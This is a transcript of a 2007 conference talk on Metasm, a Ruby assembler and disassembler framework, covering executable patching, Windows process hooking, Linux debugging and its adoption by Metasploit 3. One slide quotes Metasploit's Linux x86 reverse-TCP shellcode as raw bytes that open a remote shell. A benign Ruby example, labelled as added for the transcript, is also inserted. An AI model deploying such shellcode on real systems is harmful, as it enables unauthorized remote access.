07-hacklu-metasm
Transcript of 07-hacklu-metasm
8/8/2019 07-hacklu-metasm
1/26
Metasm, a ruby (dis)assembler
Yoann Guillot
20 october 2007
Presentation
I am Yoann Guillot. I work for Sogeti/ESEC in the security R&D lab.
Metasm HACK.LU 2007 2 / 23
Plan
1 Metasm
    Architecture overview
    Assembly
    Disassembly
    Executable file handling
    C compiler
    Live process interaction
    Use cases
    Metasploit 3
2 Demonstrations
Introduction
Metasm is a full-Ruby standalone framework
    to manipulate machine code (static or dynamic)
    multi-CPU (Ia32/MIPS for now)
    multi-OS (Windows/Linux)
distributed under the open-source LGPL license
http://metasm.cr0.org/
still under heavy development
Architecture overview
Assembly
EncodedData represents a relocatable binary string:
    binary data
    arbitrary relocations
    exports
    virtual size
used to dissociate assembly from linking
Assembly
mov eax, dword ptr [toto]
Disassembly
simple yet powerful backtracking engine
emulates standard CPU instructions
    follows the code flow precisely
    currently unfinished:
        trace data access
        handle subfunctions
        handle external API calls
minimal arch-specific development
Handling executable files
reading
    from a file
    directly in memory
writing
    from scratch
    patch an existing exe
currently supported formats: MZ / PE / COFF, ELF / a.out
C Compilation
Metasm includes a complete C parser
features header filtering
basic compiler for Ia32
Live process interaction
String-like process memory abstraction
transparent read/write
Ruby objects wrap the host OS debug API
When is it useful
whenever you want to manipulate machine code or executable files
it's easy to hook/rewrite/customize any internal method
Metasploit 3 - before
Metasploit 3 is also written in Ruby
it had very bad machine code support:
    hexadecimal static shellcodes
    hacks to patch the shellcodes with user-specified values
    more hacks to link stages
Metasploit 3 - before [metasploit3/.../reverse_tcp.rb]

    'Payload' =>
    {
      'Offsets' =>
      {
        'LHOST' => [ 0x1a, 'ADDR' ],
        'LPORT' => [ 0x20, 'n' ],
      },
      'Payload' =>
        "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59" +
        "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x7f\x00\x00\x01\x66\x68" +
        "\xbf\xbf\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd" +
        "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" +
        "\x89\xe1\xb0\x0b\xcd\x80"
    }
Metasploit 3 - now [metasploit3/.../reverse_tcp2.rb]

    'Payload' => {
      'Offsets' => {
        'LHOST' => [ 0, 'ADDR' ],
        'LPORT' => [ 0, 'n' ],
      },
      'Assembly' =>
Metasploit 3 - now
Metasm is now included in Metasploit
shellcodes can be in source form
standard Metasm relocation handling may be used for shellcode patching/linking
???
Profit !
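The "relocatable binary string" idea behind EncodedData (Assembly slide above) and the relocation-based patching/linking Metasploit now gets from Metasm, as an added example written for this transcript rather than Metasm's or Metasploit's own code: the class and method names (RelocData, reloc_imm, fixup!, assemble_then_link) are assumptions, and the code assembles the slide's `mov eax, dword ptr [toto]` while the address of `toto` is still unknown, then links it.

```ruby
# Illustrative model of a relocatable binary string in the spirit of
# Metasm's EncodedData (data + relocations + exports + virtual size).
# Written for this transcript; it is NOT Metasm's own code or API.
class RelocData
  Reloc = Struct.new(:symbol, :size, :endianness)
  attr_reader :data, :reloc, :export, :virtsize

  def initialize
    @data = "".b     # raw bytes produced by the assembler
    @reloc = {}      # offset => Reloc to be patched at link time
    @export = {}     # label => offset inside data
    @virtsize = 0    # mapped size (may exceed data for bss-like tails)
  end
  def <<(bytes)
    @data << bytes.b
    @virtsize = [@virtsize, @data.bytesize].max
    self
  end
  def label(name)    # define a label at the current end of data
    @export[name] = @data.bytesize
    self
  end
  def reloc_imm(symbol, size, endianness = :little)
    @reloc[@data.bytesize] = Reloc.new(symbol, size, endianness)
    self << ("\0" * size)   # zeroed placeholder the linker fills in
  end

  # Link step: patch relocations whose symbol is known; unknown symbols
  # stay pending so the object can be linked again later.
  def fixup!(symbols)
    @reloc.delete_if do |off, r|
      next false unless symbols.key?(r.symbol)
      val = symbols[r.symbol] & ((1 << (8 * r.size)) - 1)
      bytes = Array.new(r.size) { |i| (val >> (8 * i)) & 0xff }
      bytes.reverse! if r.endianness == :big
      @data[off, r.size] = bytes.pack("C*")
      true
    end
    self
  end
end

# The slide's `mov eax, dword ptr [toto]` (Ia32: opcode 0xa1 + 32-bit address)
# assembled while `toto` is unknown, then linked once its address is chosen.
def assemble_then_link(toto_addr)
  ed = RelocData.new << "\xa1".b
  ed.reloc_imm(:toto, 4).label(:next_insn)
  ed.fixup!(toto: toto_addr)
  { linked: ed.data, pending: ed.reloc.size, next_insn: ed.export[:next_insn] }
end
```

Big-endian relocations (the MIPS case) use the same path with `:big`; a symbol missing from the table is simply left pending rather than patched with a wrong value.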
Plan
1 Metasm
2 Demonstrations
    metasm-shell
    Exe manipulation
    Live process interaction
metasm-shell
adds metasm methods to standard Ruby Strings
offers an interactive assembler shell
Exe manipulation
reading a MIPS ELF
compiling a simple PE [samples/testpe.rb]
patching a PE [samples/pe-hook.rb]
Windows process hooking
simple IAT hook [samples/win32hooker.rb]
Windows process hooking
full-library hook [samples/win32hooker-advanced.rb]
redirect all exported functions to a custom hook
Linux debugging
ptrace wrapper [samples/rubstop.rb]
    singlestep, stepover, etc.
    memory access
    PaX compatible
UI [samples/lindebug.rb]
    console-mode only (for now)
Conclusion
Thanks for listening
Questions ?